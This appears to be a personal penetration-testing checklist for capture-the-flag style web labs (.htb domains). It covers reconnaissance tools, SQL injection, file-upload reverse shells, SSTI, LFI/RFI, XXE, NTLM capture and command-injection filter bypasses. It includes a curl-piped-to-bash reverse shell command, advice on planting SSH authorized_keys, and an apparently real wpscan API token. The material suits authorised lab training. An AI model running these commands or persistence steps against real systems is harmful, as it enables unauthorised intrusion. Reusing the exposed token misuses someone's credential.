- Is there maybe a walkthrough of what you’re trying to do? if so just follow it just google and try to understand what you’re dealing with
- check HTML source
- search for possible username in website/HTML source
- DNS name wrong maybe?
- search for new domains on the website itself something like
web.box.htb
- search for new domains on the website itself something like
- Wappalyzer
- nikto
- wpscan (api-token=PuHLRlILzrWrL0CDUE4dsORNwoq4l56mxQF5kHO2ZX0)
- Google version numbers of EVERYTHING
- Gobuster!
- DEFAULT PASSWORDS
- inspect the links the website has… maybe some URL parameters like IDs?
- Look for templates/way to input copy the request and send it to sqlmap
- if possible upload a file and execute a reverse shell
- If it doesn’t let you upload certain files mess with the extension
- later to find where the uploaded file is you can use Gobuster because sometimes it is renamed example:
gobuster dir -u http://example.com/uploads/ -w wordlist
then gobuster will search through the uploads directory. - https://www.revshells.com
- you can do a reverse shell with curl:
curl http://<your ip>/shell.sh | bash
- sometimes you can’t get a shell because connections on other ports are blocked with a firwall in that case try to use services available like ssh
- you can generate ssh keys and upload the into the home directory of the user as
authorized_keys
- use different ASCII values for everything to avoid stupid bugs
- Cookies
- look for new directories in burpsuite
target
tab - if you find strings/documents, check for base64 and cyberchef magic
- use Repeater
- Hacktricks
- LFI or RFI
- SSTI
- those can be everywhere. any input you can do, be it text, image, voice, OCR etc check for SSTI by providing things like
{{7 * 7}}
or$ {{7 * 7}}
- those can be everywhere. any input you can do, be it text, image, voice, OCR etc check for SSTI by providing things like
- XXE?
- capture ssh keys also from LFI/RFI and XXE
- capture windows NTLM (responder) also from LFI/RFI and XXE
- API
- APIs can sometimes execute system commands, however the input is filtered, try to bypass those filters. For example with
\n
in the front of you command or a'
.
- APIs can sometimes execute system commands, however the input is filtered, try to bypass those filters. For example with